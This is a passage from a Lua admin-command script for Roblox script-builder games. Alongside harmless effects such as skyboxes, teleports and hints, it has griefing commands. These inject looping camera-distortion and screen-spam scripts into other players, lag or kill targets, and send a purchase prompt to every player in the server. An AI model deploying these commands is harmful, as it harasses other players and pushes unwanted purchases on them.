  3679.                 end
  3680.             )()
  3681.             wait()
  3682.         end
  3683.         wait(3)
  3684.         for i=#Msg,0,-1 do
  3685.             v.Text = Msg:sub(1,i)
  3686.             wait()
  3687.         end
  3688.         v:Remove()  
  3689.     end
  3690. )
  3691. YourCommand("Hint","h",1,
  3692.     function(Msg,Speaker)
  3693.         Msg = Msg:gsub("\t"," ")
  3694.         Msg = Msg:gsub("\n"," ")
  3695.         Msg = "["..Speaker.Name.."]\t"..Msg
  3696.         local v = Instance.new("Hint",Services.Workspace)
  3697.         for i=0,#Msg,0.3 do
  3698.             v.Text = (
  3699.                 function()
  3700.                     local Rtn = Msg:sub(0,i)
  3701.                     repeat
  3702.                         Rtn = Rtn .. tostring(string.char(math.random(48,57))) -- 37 127
  3703.                     until #Rtn >= #Msg
  3704.                     return Rtn:sub(1,#Rtn-1)
  3705.                 end
  3706.             )()
  3707.             wait()
  3708.         end
  3709.         wait(3)
  3710.         for i=#Msg,0,-1 do
  3711.             v.Text = Msg:sub(1,i)
  3712.             wait()
  3713.         end
  3714.         v:Remove()  
  3715.     end
  3716. )
  3717. YourCommand("System Message","sys",5,
  3718.     function(Msg,Speaker)
  3719.        Msg = Msg:gsub("\t"," ")
  3720.         Msg = Msg:gsub("\n"," ")
  3721.         Msg = "[SB SYSTEM]\t"..Msg
  3722.         local v = Instance.new("Message",Services.Workspace)
  3723.                 local Total = string.len(Msg)
  3724.                 local Max = 100
  3725.         for i=0,#Msg,0.3 do
  3726.             v.Text = (
  3727.                 function()
  3728.                     local Rtn = Msg:sub(0,i)
  3729.                     repeat
  3730.                         Rtn = Rtn .. tostring(string.char(math.random(48,57))) -- 37 127
  3731.                     until #Rtn >= #Msg
  3732.                     return Rtn:sub(1,#Rtn-1)
  3733.                 end
  3734.             )()
  3735.             wait()
  3736.         end
  3737.         for i=1,math.random(4,6) do
  3738.                         v.Text = Msg:sub(Total-Max,Total).."|"
  3739.                         wait(0.5)
  3740.                         v.Text = Msg:sub(Total-Max,Total).."  "
  3741.                         wait(0.5)
  3742.                 end
  3743.         for i=#Msg,0,-1 do
  3744.             v.Text = Msg:sub(1,i)
  3745.             wait()
  3746.         end
  3747.         v:remove()  
  3748.     end
  3749. )
  3750. YourCommand("System Message Hint","sysh",5,
  3751.     function(Msg,Speaker)
  3752.               Msg = Msg:gsub("\t"," ")
  3753.         Msg = Msg:gsub("\n"," ")
  3754.         Msg = "[SB SYSTEM]\t"..Msg
  3755.         local v = Instance.new("Hint",Services.Workspace)
  3756.                 local Total = string.len(Msg)
  3757.                 local Max = 100
  3758.         for i=0,#Msg,0.3 do
  3759.             v.Text = (
  3760.                 function()
  3761.                     local Rtn = Msg:sub(0,i)
  3762.                     repeat
  3763.                         Rtn = Rtn .. tostring(string.char(math.random(48,57))) -- 37 127
  3764.                     until #Rtn >= #Msg
  3765.                     return Rtn:sub(1,#Rtn-1)
  3766.                 end
  3767.             )()
  3768.             wait()
  3769.         end
  3770.         for i=1,math.random(4,6) do
  3771.                         v.Text = Msg:sub(Total-Max,Total).."|"
  3772.                         wait(0.5)
  3773.                         v.Text = Msg:sub(Total-Max,Total).."  "
  3774.                         wait(0.5)
  3775.                 end
  3776.         for i=#Msg,0,-1 do
  3777.             v.Text = Msg:sub(1,i)
  3778.             wait()
  3779.         end
  3780.         v:remove()  
  3781.     end
  3782. )
  3783. YourCommand('Get Age','getage',4,
  3784.  function(Msg,Speaker)
  3785. local a = GetPlayers(Msg,Speaker)
  3786. for i,v in pairs(a) do
  3787. local at = 0
  3788. local age = v.AccountAge
  3789. while true do
  3790. wait()
  3791. if age - 365 < 0 then
  3792. break
  3793. end
  3794. at = at + 1
  3795. age = age - 365
  3796. end
  3797. local h = Instance.new("Hint", workspace)
  3798. h.Text = v.Name.."'s Account is "..at.." Year(s) old and "..age.." Day(s) old"
  3799.         loggit("Got Account Age Results Were: "..v.Name.."'s Account is "..at.." Year(s) old and "..age.." Day(s) old" )
  3800. wait(4)
  3801. if h then
  3802. h:remove()
  3803. end
  3804. end end
  3805. )
  3806. YourCommand("Trall","trall",3,
  3807.         function(Msg,Speaker)
  3808.                 for _,v in pairs(GetPlayers(Msg,Speaker)) do
  3809.                         CDS = CreateLocalScript([[
  3810.                                 script.Parent = nil
  3811.                                 LocalPlayer = game.Players.LocalPlayer
  3812.                                 Camera = workspace.CurrentCamera
  3813.                                 Camera.CameraType = "Scriptable"
  3814.                                 for i=1,700 do
  3815.                                         wait()
  3816.                                         Camera = workspace.CurrentCamera
  3817.                                         Camera.CameraType = "Scriptable"
  3818.                                         Camera.FieldOfView = Camera.FieldOfView + math.random(-5,5)
  3819.                                         Camera.CameraType = "Scriptable"
  3820.                                         Camera:SetRoll(Camera:GetRoll()+0.01)
  3821.                                         pcall(function()
  3822.                                                 LocalPlayer.Character.Head.Sound:Play()
  3823.                                         end)
  3824.                                 end
  3825.                                 Camera:SetRoll(0)
  3826.                                 Camera.CameraType = "Custom"
  3827.                                 Camera.FieldOfView = 70
  3828.                                 Camera.CameraSubject = game.Players.LocalPlayer.Character.Humanoid
  3829.                         ]],v.Backpack)
  3830.                         if not CDS then
  3831.                                 Output('Needs Local Source','Red',Speaker,3)
  3832.                                 end
  3833.                 end
  3834.         end
  3835. )
  3836. YourCommand("Purchase item","purchase",6,
  3837.         function(Msg,Speaker)
  3838.         for _,v in pairs (game.Players:GetPlayers()) do
  3839.                         game:GetService("MarketplaceService"):PromptPurchase(v, (Msg))
  3840.                 end
  3841.         end)
  3842. YourCommand("PremaTrall","permatrall",4,
  3843.         function(Msg,Speaker)
  3844.                 for _,v in pairs(GetPlayers(Msg,Speaker)) do
  3845.                         CDS = CreateLocalScript([[
  3846.                                 local cc = game:GetService("Workspace").CurrentCamera
  3847. coroutine.wrap(function()
  3848.         while true do
  3849.                 for i = 20, 80 do
  3850.                         cc.FieldOfView = i
  3851.                         wait()
  3852.                 end
  3853.                 for i = 80, 20, -1 do
  3854.                         cc.FieldOfView = i
  3855.                         wait()
  3856.                 end
  3857.         end
  3858. end)()
  3859. coroutine.wrap(function()
  3860.         while true do
  3861.                 for i = 0, 360 do
  3862.                         cc:SetRoll(math.rad(i * 2))
  3863.                         wait()
  3864.                 end
  3865.                 for i = 360, 0, -1 do
  3866.                         cc:SetRoll(math.rad(i * 2))
  3867.                         wait()
  3868.                 end
  3869.         end
  3870. end)()
  3871. cc.CameraType = "Scriptable"
  3872. local plrg = game:GetService("Players").LocalPlayer:findFirstChild("PlayerGui")
  3873. local g = Instance.new("ScreenGui", plrg)
  3874. coroutine.wrap(function()
  3875.         local trolls = {}
  3876.         for i = 0, 100 do
  3877.                 local ni = Instance.new("ImageLabel", g)
  3878.                 ni.Size = UDim2.new(0.15, 0, 0.15, 0)
  3879.                 ni.ZIndex = math.random(10)
  3880.                 ni.Image = "http://www.roblox.com/asset/?id=45120559"
  3881.                 table.insert(trolls, ni)
  3882.         end
  3883.         while wait(0.1) do
  3884.                 for i, v in pairs(trolls) do
  3885.                         v.Position = UDim2.new(math.random(), 0, math.random(), 0)
  3886.                         v.BackgroundColor3 = BrickColor.Random().Color
  3887.                         v.BorderColor3 = BrickColor.Random().Color
  3888.                         v.BackgroundTransparency = math.random()
  3889.                 end
  3890.         end
  3891. end)()
  3892. local character = game:GetService("Players").LocalPlayer.Character:findFirstChild("Torso")
  3893. character:findFirstChild("Neck").DesiredAngle = 9e9
  3894. while wait() do
  3895.         for i,v in pairs(character:GetChildren()) do
  3896.                 if v:IsA("Motor6D") and v.Name ~= "Neck" then
  3897.                         v.DesiredAngle = 9e9
  3898.                 end
  3899.         end
  3900. end
  3901.                         ]],v.Backpack)
  3902.                         if not CDS then
  3903.                                 Output('Needs Local Source','Red',Speaker,3)
  3904.                                 end
  3905.                 end
  3906.         end
  3907. )
  3908. YourCommand('Get cmd bar','getcmd',7,
  3909. function(Msg,Speaker)
  3910.         MakeCmd(Speaker);
  3911.     end
  3912. )
  3913.  
  3914.  
  3915. YourCommand('Explode','expl',1,
  3916.     function(Msg,Speaker) for _,v in pairs(GetPlayers(Msg,Speaker)) do C = v.Character.Torso Instance.new('Explosion',C).Position = C.Position end end
  3917. )
  3918. YourCommand('Jump','jump',1,
  3919.     function(Msg,Speaker)
  3920.         for _,v in pairs(GetPlayers(Msg,Speaker)) do v.Character.Humanoid.Jump=true end
  3921.     end
  3922. )
  3923. YourCommand('Sit','sit',1,
  3924.     function(Msg,Speaker) for _,v in pairs(GetPlayers(Msg,Speaker)) do v.Character.Humanoid.Sit=true end end
  3925. )
  3926. YourCommand('Lag','lag',6,
  3927.     function(Msg,Speaker) for _,v in pairs(GetPlayers(Msg,Speaker)) do Lag(v) end end
  3928. )
  3929. YourCommand('Lol','lol',1,
  3930.     function(Msg,Speaker)
  3931.         for TheNumberOfPlayer,Player in pairs(GetPlayers(Msg,Speaker)) do
  3932.                 local Texts = {'LOL','LOOL','L0L','Lawlz','Lel'}
  3933.                     Delay(0,function()
  3934.                             for i=1,#Texts do
  3935.                                     local Rand = Texts[math.random(1,#Texts)]
  3936.                                     game:service'Chat':Chat(Player.Character.Head,Rand,Enum.ChatColor.Red)
  3937.                                     wait(3)
  3938.                             end
  3939.                     end)
  3940.                     for _,v in pairs(Player.Character:GetChildren()) do
  3941.                         if v:IsA('BasePart') then
  3942.                             v.BrickColor = BrickColor.new('Yellow')
  3943.                         end
  3944.                     end
  3945.         end
  3946.     end
  3947. )
  3948. YourCommand('Jumpkill','jkill',5,
  3949.     function(Msg,Speaker)
  3950.         for _,v in pairs(GetPlayers(Msg,Speaker)) do
  3951.             Killed=false
  3952.             for i=1,100 do
  3953.                 if Killed==false then
  3954.                     if v.Character.Humanoid.Health < 0 then Killed=true end
  3955.                     local Sub = v.Character.Humanoid.MaxHealth/100
  3956.                     v.Character.Humanoid.Jump=true
  3957.                     wait()
  3958.                     v.Character.Humanoid.Sit=true
  3959.                     wait()
  3960.                     v.Character.Humanoid:TakeDamage(Sub)
  3961.                     wait(0.09)  
  3962.                 end
  3963.             end
  3964.         end
  3965.     end
  3966. )
  3967. YourCommand('Set desc','setdesc',3,
  3968.         function(Msg,Speaker)
  3969.         Sp = Msg:find(YourBet2)
  3970.         if Sp then
  3971.                 Players=Msg:sub(1,Sp-1)
  3972.                 NewDesc=Msg:sub(Sp+1)
  3973.                 for _,v in pairs(GetPlayers(Players,Speaker)) do
  3974.                     Ranked[v.Name].Desc=NewDesc
  3975.                 end
  3976.         else
  3977.                 Output('[Unlimited] ; Split missing','Green',Speaker,5)
  3978.         end
  3979.         end
  3980. )
  3981. YourCommand('Base','base',1,
  3982.         function(Msg,Speaker)
  3983.         pcall(function() game.Workspace:FindFirstChild('Base'):Destroy() end)
  3984.         if Base then Base:Clone().Parent=game.Workspace else
  3985.             local Basic=Instance.new('Part')
  3986.             Basic.Name='Base'
  3987.             Basic.Color=Color3.new(0,1,0)
  3988.             Basic.TopSurface='Smooth'
  3989.             Basic.Anchored=true
  3990.             Basic.Size=Vector3(100,1,100)
  3991.             Basic.Material='Grass'
  3992.             Basic.Parent=game.Workspace
  3993.         end
  3994.         end
  3995. )
  3996. YourCommand('Forcefield','ff',1,
  3997.         function(Msg,Speaker)
  3998. local a = GetPlayers(Msg,Speaker)
  3999. for i,v in pairs(a) do
  4000. if v.Character then
  4001. Instance.new("ForceField", v.Character).Name = "forcefield"
  4002. end
  4003. end
  4004. end
  4005. )
  4006.  
  4007.  
  4008. YourCommand('Banned','Banned',7,
  4009.     function(Msg,Speaker)
  4010.         for TheName,v in pairs(Ranked) do
  4011.             if v.Rank ~= -0.5 and v.Rank < 0 then
  4012.             Output(TheName,'Red',Speaker,nil,
  4013.                 function()
  4014.                     RemoveTablets(Speaker)
  4015.                     Output('Would you like to unban ' .. TheName .. '?','Red',Speaker,nil,
  4016.                         function()
  4017.                             Ranked[TheName].Rank=0
  4018.                         end
  4019.                     )
  4020.                 end
  4021.             )
  4022.             end
  4023.         end
  4024.     end
  4025. )
  4026. Delay(0,function()
  4027.     while wait() do
  4028.         if Base==nil then
  4029.             BaseFind=game.Workspace:findFirstChild('Base')
  4030.             if BaseFind then Base = BaseFind:Clone() end
  4031.         end
  4032.     end
  4033. end)
  4034. YourCommand('Rejoin','rejoin',0,
  4035.     function(Msg,Speaker)
  4036.         repeat
  4037.         wait()
  4038.         until Speaker:findFirstChild('Backpack')
  4039.         CreateLocalScript("game:service'TeleportService':Teleport(game.PlaceId)",Speaker.Backpack)
  4040.     end
  4041. )
  4042. YourCommand('Nyan','nyan',6,
  4043.         function(Msg,Speaker)
  4044.                 local sky = Instance.new("Sky")
  4045.                 sky.Parent = game.Lighting
  4046.                 sky.SkyboxBk = "http://www.roblox.com/asset/?id=55987937"
  4047.                 sky.SkyboxDn = "http://www.roblox.com/asset/?id=55987937"
  4048.                 sky.SkyboxFt = "http://www.roblox.com/asset/?id=55987937"
  4049.                 sky.SkyboxLf = "http://www.roblox.com/asset/?id=55987937"
  4050.                 sky.SkyboxRt = "http://www.roblox.com/asset/?id=55987937"
  4051.                 sky.SkyboxUp = "http://www.roblox.com/asset/?id=55987937"
  4052. loggit('Changed Sky')
  4053.         end
  4054. )
  4055. YourCommand('Reset Lighting','rl',1,
  4056.  function(Msg,Speaker)
  4057. for i,v in pairs(game:GetService("Lighting"):GetChildren()) do
  4058. v:remove()
  4059. end
  4060. local light = game:GetService("Lighting")
  4061. light.TimeOfDay = "14:00:00"
  4062. light.Brightness = 1
  4063. light.ColorShift_Bottom = Color3.new(0, 0, 0)
  4064. light.ColorShift_Top = Color3.new(0, 0, 0)
  4065. light.ShadowColor = Color3.new(178, 178, 178)
  4066. light.Ambient = Color3.new(1, 1, 1)
  4067. light.FogStart= 0
  4068. light.FogEnd= 10000000000000
  4069.         loggit("Reset lighting")
  4070. end
  4071. )
  4072. YourCommand('Flames','flame',6,
  4073.         function(Msg,Speaker)
  4074.                 local sky = Instance.new("Sky")
  4075.                 sky.Parent = game.Lighting
  4076.                 sky.SkyboxBk = "http://www.roblox.com/asset/?id=26356415"
  4077.                 sky.SkyboxDn = "http://www.roblox.com/asset/?id=26356415"
  4078.                 sky.SkyboxFt = "http://www.roblox.com/asset/?id=26356415"
  4079.                 sky.SkyboxLf = "http://www.roblox.com/asset/?id=26356415"
  4080.                 sky.SkyboxRt = "http://www.roblox.com/asset/?id=26356415"
  4081.                 sky.SkyboxUp = "http://www.roblox.com/asset/?id=26356415"
  4082. loggit('Changed Sky')
  4083.         end
  4084. )
  4085. YourCommand('Slenderman','slender',6,
  4086.         function(Msg,Speaker)
  4087.                 local sky = Instance.new("Sky")
  4088.                 sky.Parent = game.Lighting
  4089.                 sky.SkyboxBk = "http://www.roblox.com/asset/?id=90199618"
  4090.                 sky.SkyboxDn = "http://www.roblox.com/asset/?id=90199618"
  4091.                 sky.SkyboxFt = "http://www.roblox.com/asset/?id=90199618"
  4092.                 sky.SkyboxLf = "http://www.roblox.com/asset/?id=90199618"
  4093.                 sky.SkyboxRt = "http://www.roblox.com/asset/?id=90199618"
  4094.                 sky.SkyboxUp = "http://www.roblox.com/asset/?id=90199618"
  4095. loggit('Changed Sky')
  4096.         end
  4097. )
  4098. YourCommand('Pacman','pacman',6,
  4099.         function(Msg,Speaker)
  4100.                 local sky = Instance.new("Sky")
  4101.                 sky.Parent = game.Lighting
  4102.                 sky.SkyboxBk = "http://www.roblox.com/asset/?id=29497998"
  4103.                 sky.SkyboxDn = "http://www.roblox.com/asset/?id=29497998"
  4104.                 sky.SkyboxFt = "http://www.roblox.com/asset/?id=29497998"
  4105.                 sky.SkyboxLf = "http://www.roblox.com/asset/?id=29497998"
  4106.                 sky.SkyboxRt = "http://www.roblox.com/asset/?id=29497998"
  4107.                 sky.SkyboxUp = "http://www.roblox.com/asset/?id=29497998"
  4108. loggit('Changed Sky')
  4109.         end
  4110. )
  4111. YourCommand('Troll','Tr',6,
  4112.         function(Msg,Speaker)
  4113.                 local sky = Instance.new("Sky")
  4114.                 sky.Parent = game.Lighting
  4115.                 sky.SkyboxBk = "http://www.roblox.com/asset/?id=23881644"
  4116.                 sky.SkyboxDn = "http://www.roblox.com/asset/?id=23881644"
  4117.                 sky.SkyboxFt = "http://www.roblox.com/asset/?id=23881644"
  4118.                 sky.SkyboxLf = "http://www.roblox.com/asset/?id=23881644"
  4119.                 sky.SkyboxRt = "http://www.roblox.com/asset/?id=23881644"
  4120.                 sky.SkyboxUp = "http://www.roblox.com/asset/?id=23881644"
  4121. loggit('Changed Sky')
  4122.         end
  4123. )
  4124. YourCommand('Shedletsky','Shedlet',6,
  4125.         function(Msg,Speaker)
  4126.                 local sky = Instance.new("Sky")
  4127.                 sky.Parent = game.Lighting
  4128.                 sky.SkyboxBk = "http://www.roblox.com/asset/?id=92767799"
  4129.                 sky.SkyboxDn = "http://www.roblox.com/asset/?id=92767799"
  4130.                 sky.SkyboxFt = "http://www.roblox.com/asset/?id=92767799"
  4131.                 sky.SkyboxLf = "http://www.roblox.com/asset/?id=92767799"
  4132.                 sky.SkyboxRt = "http://www.roblox.com/asset/?id=92767799"
  4133.                 sky.SkyboxUp = "http://www.roblox.com/asset/?id=92767799"
  4134. loggit('Changed Sky')
  4135.         end
  4136. )
  4137. YourCommand('Lua','Lua',6,
  4138.         function(Msg,Speaker)
  4139.                 local sky = Instance.new("Sky")
  4140.                 sky.Parent = game.Lighting
  4141.                 sky.SkyboxBk = "http://www.roblox.com/asset/?id=66825616"
  4142.                 sky.SkyboxDn = "http://www.roblox.com/asset/?id=66825616"
  4143.                 sky.SkyboxFt = "http://www.roblox.com/asset/?id=66825616"
  4144.                 sky.SkyboxLf = "http://www.roblox.com/asset/?id=66825616"
  4145.                 sky.SkyboxRt = "http://www.roblox.com/asset/?id=66825616"
  4146.                 sky.SkyboxUp = "http://www.roblox.com/asset/?id=66825616"
  4147. loggit('Changed Sky')
  4148.         end
  4149. )
  4150.  
  4151. YourCommand('Abort shutdown','abort',7,
  4152.     function(Msg,Speaker)
  4153. Abort = true
  4154. end
  4155. )
  4156. YourCommand('Teleport','tp',2,
  4157.     function(Msg,Speaker)
  4158.     Split=Msg:find(YourBet2)
  4159.     Player1 = GetPlayers(Msg:sub(1,Split-1),Speaker)
  4160.     Player2 = GetPlayers(Msg:sub(Split+1),Speaker)
  4161.     for i,v in pairs(Player1) do
  4162.         for ii,e in pairs(Player2) do
  4163.             CF = CFrame.new(0,0,0)
  4164.             CF2= CFrame.new()
  4165.             CF2 = e.Character.Torso.CFrame
  4166.             v.Character.Torso.CFrame = CFrame.new(CF2.x,CF2.y + tonumber(i+4), CF2.z)
  4167.         end
  4168.     end
  4169.     end
  4170. )
  4171. NewOutput('SBUCS Has Loaded','Yellow',100)
  4172. NewOutput('Edited by someone','Green',100)
  4173. NewOutput('By '..string.reverse(string.gsub("DERPkDERPcDERPuDERPfDERP","DERP","")),'Red',100)
  4174. YourCommand("Circle Teleport","ctp",2,
  4175.         function(Msg,Speaker)
  4176.                 local Split = Msg:find(YourBet2)
  4177.                 local From = GetPlayers(Msg:sub(1,Split-1),Speaker)
  4178.                 local To = GetPlayers(Msg:sub(Split+1),Speaker)[1]
  4179.                 local Current = 0
  4180.                 for i=-180,180,360/#From do
  4181.                         Current = Current + 1
  4182.                         pcall(function()
  4183.                                 if From[Current] ~= To then
  4184.                                         From[Current].Character.Torso.CFrame = To.Character.Torso.CFrame
  4185.                                                 * CFrame.Angles(0,math.rad(i),0)
  4186.                                                 * CFrame.new(0,0,5 + (#From*1.1))
  4187.                                 end
  4188.                         end)
  4189.                 end
  4190.         end
  4191. )
  4192. YourCommand("Semi-Circle Teleport","sctp",2,
  4193.         function(Msg,Speaker)
  4194.                 local Split = Msg:find(YourBet2)
  4195.                 local From = GetPlayers(Msg:sub(1,Split-1),Speaker)
  4196.                 local To = GetPlayers(Msg:sub(Split+1),Speaker)[1]
  4197.                 local Current = 0
  4198.                 for i=-90,90,180/#From do
  4199.                         Current = Current + 1
  4200.                         pcall(function()
  4201.                                 if From[Current] ~= To then
  4202.                                         From[Current].Character.Torso.CFrame = To.Character.Torso.CFrame
  4203.                                                 * CFrame.Angles(0,math.rad(i),0)
  4204.                                                 * CFrame.new(0,0,5 + (#From*1.1))
  4205.                                 end
  4206.                         end)
  4207.                 end
  4208.         end
  4209. )
  4210. YourCommand("Quarter-Circle Teleport","qctp",2,
  4211.         function(Msg,Speaker)
  4212.                 local Split = Msg:find(YourBet2)
  4213.                 local From = GetPlayers(Msg:sub(1,Split-1),Speaker)
  4214.                 local To = GetPlayers(Msg:sub(Split+1),Speaker)[1]
  4215.                 local Current = 0
  4216.                 for i=-45,45,90/#From do
  4217.                         Current = Current + 1
  4218.                         pcall(function()
  4219.                                 if From[Current] ~= To then
  4220.                                         From[Current].Character.Torso.CFrame = To.Character.Torso.CFrame
  4221.                                                 * CFrame.Angles(0,math.rad(i),0)
  4222.                                                 * CFrame.new(0,0,5 + (#From*1.1))
  4223.                                 end
  4224.                         end)
  4225.                 end
  4226.         end
  4227. )
  4228. YourCommand('Noobify','noob',1,
  4229.     function(Msg,Speaker)
  4230.         for _,v in pairs(GetPlayers(Msg,Speaker)) do
  4231. v.CharacterAppearance = "http://www.roblox.com/Asset/CharacterFetch.ashx?userId=65765766666" wait() v:LoadCharacter()
  4232.         end
  4233.     end
  4234. )
  4235. YourCommand('Nil','nil',4,
  4236.     function(Msg,Speaker)
  4237.         for _,v in pairs(GetPlayers(Msg,Speaker)) do
  4238.         v.Character=nil end
  4239.     end
  4240. )
  4241. YourCommand('Fix Char','charfix',0,
  4242.     function(Msg,Speaker)
  4243. BaseUrl="http://www.roblox.com/Asset/CharacterFetch.ashx?userId="
  4244.     if #Msg == 0 then
  4245.         Speaker.CharacterApperance=BaseUrl..Speaker.userId
  4246.         Speaker:LoadCharacter()
  4247.     else
  4248.         for _,v in pairs(GetPlayers(Msg,Speaker)) do
  4249.             v.CharacterAppearance=BaseUrl..v.userId
  4250.             v:LoadCharacter()
  4251.         end
  4252.     end
  4253.     end
  4254. )
  4255.  
  4256.  
  4257. YourCommand("SpinBase","bspin",2,
  4258.     function(Msg,Speaker)
  4259.         local base = Services.Workspace:FindFirstChild("Base") or Services.Workspace:FindFirstChild("BasePlate")
  4260.         while base and wait() do
  4261.             base.CFrame = base.CFrame*CFrame.Angles(0,math.rad(3),0)
  4262.         end
  4263.     end
  4264. )
  4265. YourCommand("Spin","spin",3,
  4266.     function(Msg,Speaker)
  4267.         for i,v in pairs(GetPlayers(Msg,Speaker)) do
  4268.             if v.Character and v.Character.Torso then
  4269.                 v.Character.Torso.Anchored = true
  4270.                 Delay(0, function()
  4271.                     for i=1,360 do
  4272.                         v.Character.Torso.CFrame = v.Character.Torso.CFrame * CFrame.Angles(math.rad(i),math.rad(i),0)
  4273.                         wait(0.01)
  4274.                     end
  4275.                     v.Character.Torso.Anchored = false
  4276.                 end)
  4277.             end
  4278.         end
  4279.     end
  4280. )
  4281.  
  4282.  
  4283. YourCommand('Connect to nil','connect',5, -- Connects to nil
  4284.     function(Msg,Speaker)
  4285.     repeat
  4286.     wait()
  4287.     until Speaker:findFirstChild('Backpack')
  4288.              KPL =  CreateLocalScript( [==[                                            -- [UNLIMITED] NIL CONNECT --
  4289.                                   -- [UNLIMITED] NIL CONNECT --
  4290.                
  4291.                         Workspace = game:GetService("Workspace");
  4292.                     Lighting = game:GetService("Lighting");
  4293.                     Debris = game:GetService("Debris");
  4294.                     Players = game:GetService("Players");
  4295.                     Teams = game:GetService("Teams");
  4296.                     SoundService = game:GetService("SoundService");
  4297.                     StarterGui = game:GetService("StarterGui");
  4298.                     StarterPack = game:GetService("StarterPack")
  4299.                 LocalPlayer = game:service'Players'.LocalPlayer;
  4300.                 Camera = workspace.CurrentCamera;
  4301.                 h = Instance.new("Hint",Workspace)
  4302.                 h.Text = "||SBUCS|| works when nil"
  4303.                 wait(2)
  4304.                 h.Parent = nil
  4305.             script.Name = "Camera"
  4306.                         wait()
  4307.             script.Parent = nil
  4308.                 Rotation = 0
  4309.                 RotationIncrease = 0.1
  4310.         local P = Instance.new('ObjectValue')
  4311.         P.Parent=LocalHead
  4312.         P.Name='Player'
  4313.         P.Value=LocalPlayer
  4314.   LocalPlayer.Chatted:connect(function(Msg)
  4315.         if Msg:lower() == "char;" then
  4316.                 pcall(function() LocalHead:Destroy()
  4317.                         oo:Destroy() sbl:Destroy() end)
  4318.                 Spawn()
  4319.         elseif Msg:lower() == "probe;" then
  4320.                 pcall(function() LocalPlayer.Character:Destroy() end)
  4321.                 Probe()
  4322.         end
  4323.                                 if LocalPlayer.Parent == nil or Msg:sub(1,1) == "#" then
  4324.                                         local Head = Instance.new("Part",workspace)
  4325.                                         Head.Name = LocalPlayer.Name
  4326.                                         game:service'Chat':Chat(Head,Msg,math.random(0,2))
  4327.                                         Head:Destroy()
  4328.                                 end
  4329.                                 if ppl == true then
  4330.                                         else return end
  4331. if #Msg < 100 then  
  4332.             MsgStr = Msg
  4333.             local BBG = Instance.new("BillboardGui",LocalHead)  
  4334.         BBG.Name = "NilGui"
  4335.         BBG.StudsOffset = Vector3.new(0,5,0)
  4336.         BBG.Size = UDim2.new(10,0,10,0)
  4337.         local Label = Instance.new("TextLabel",BBG)
  4338.         Label.Name = "NilText"
  4339.         Label.Text = Msg
  4340.         Label.TextColor3 = LocalHead.Color
  4341.                 Label.Font = "SourceSans" -- Good Font
  4342.         Label.FontSize = "Size36"
  4343.         Label.BackgroundTransparency = 1
  4344.         Label.TextStrokeTransparency = 0
  4345.         Label.Size = UDim2.new(1,0,1,0)
  4346.                   Label.TextStrokeColor3 = Color3.new(0,0,0)
  4347.             for i=1,#MsgStr  do
  4348.                 Label.Text = MsgStr:sub(1,i)
  4349.                 wait(0.016)
  4350.             end
  4351.                 coroutine.wrap(function()
  4352.                                                                                 for i=1,100 do
  4353.                                                                                                 BBG.StudsOffset = Vector3.new(0,4.5 + tonumber(i/10) ,0)
  4354.                                                                                                 wait()
  4355.                                                                                 end
  4356.                                                                                 BBG:Destroy()
  4357.                                                                 end)()
  4358.                                         wait(2)
  4359.                                         BBG:Destroy()
  4360. end
  4361. end)
  4362. CharStuff = {}
  4363. if LocalPlayer.Character then
  4364.         for _,Item in pairs(LocalPlayer.Character:children()) do
  4365.                 if Item:IsA('CharacterMesh') or Item:IsA('Hat')then
  4366.                         table.insert(CharStuff,Item:Clone())
  4367.                 end
  4368.         end
  4369. end
  4370. CharStuff2 = {}
  4371. if LocalPlayer.Character then
  4372.         for _,Item in pairs(LocalPlayer.Character:children()) do
  4373.                 if Item:IsA('CharacterMesh') or Item:IsA('Hat') or Item:IsA('Shirt') or Item:IsA('Pants') then
  4374.                         table.insert(CharStuff2,Item:Clone())
  4375.                 end
  4376.         end
  4377. end
  4378. function Spawn()
  4379.         ppld = true
  4380.         ppl = false
  4381.     local Character = game:service'InsertService':LoadAsset(68452456):children()[1]
  4382.         Character.Name = LocalPlayer.Name
  4383.         Character.Parent = workspace
  4384.         LocalPlayer.Character = Character
  4385.         Character.Torso.CFrame = Camera.Focus
  4386.         Camera.CameraSubject = Character.Humanoid
  4387.         Camera.CameraType = "Custom"
  4388.                 if LocalPlayer.Name == "ziv120" or LocalPlayer.Name == "Smiley43210" then
  4389.                 local spot = Instance.new("SpotLight",Character.Head)
  4390.                 spot.Angle = 10
  4391.                 spot.Range = 10
  4392.                 spot.Color = Color3.new(1,1,1)
  4393.                 spot.Brightness = 10
  4394.                 local point = Instance.new("PointLight",Character.Head)
  4395.                 point.Range = 10
  4396.                 point.Color = Color3.new(1,1,1)
  4397.                 point.Brightness = 10
  4398.                 local Shirt = Instance.new("Shirt",Character)
  4399.         Shirt.ShirtTemplate = "http://www.roblox.com/asset/?id=90825057"
  4400.         local Pants = Instance.new("Pants",Character)
  4401.         Pants.PantsTemplate = "http://www.roblox.com/asset/?id=90825210"
  4402.                 end
  4403. coroutine.resume(coroutine.create(function()
  4404. while true do wait(0.00000001)
  4405. pcall(function()
  4406. if Character.Torso.CFrame.Y < 1 then
  4407. Character.Torso.CFrame = CFrame.new(0,20,0)
  4408. end
  4409.  end)
  4410. end
  4411. end))
  4412.  Character.Humanoid.Died:connect(function() wait(3)
  4413.         pcall(function() Character:Destroy() end) end)
  4414. Instance.new("StringValue",Character).Name = LocalPlayer.Name
  4415.    for k,v in pairs(Character:children()) do
  4416.                 if v:IsA("BasePart") then
  4417.         if LocalPlayer.Name == "C2R" then
  4418.                         v.BrickColor = BrickColor.new("Institutional white")
  4419.         else
  4420.                  v.BrickColor = BrickColor.new("Pastel brown")
  4421.  
  4422.       end
  4423. end
  4424. end
  4425. if LocalPlayer.Name == "ziv120" then
  4426. for i,v in pairs (CharStuff) do
  4427.         v:Clone().Parent = Character
  4428. end
  4429. else
  4430.         for i,v in pairs (CharStuff2) do
  4431.         v:Clone().Parent = Character
  4432.         end
  4433.                
  4434. end
  4435. if ppld == true then
  4436.         else return end
  4437. LocalPlayer.Chatted:connect(function(Msg)
  4438.         if #Msg < 100 then  
  4439.             MsgStr = Msg
  4440.             local BBG = Instance.new("BillboardGui",Character.Head)  
  4441.         BBG.Name = "NilGui"
  4442.         BBG.StudsOffset = Vector3.new(0,2.3,0)
  4443.         BBG.Size = UDim2.new(10,0,10,0)
  4444.         local Label = Instance.new("TextLabel",BBG)
  4445.         Label.Name = "NilText"
  4446.         Label.Text = Msg
  4447.         Label.TextColor3 = Color3.new(0)
  4448.                 Label.Font = "SourceSans" -- Good Font
  4449.         Label.FontSize = "Size36"
  4450.         Label.BackgroundTransparency = 1
  4451.         Label.TextStrokeTransparency = 0
  4452.         Label.Size = UDim2.new(1,0,1,0)
  4453.                   Label.TextStrokeColor3 = Color3.new(0,1)
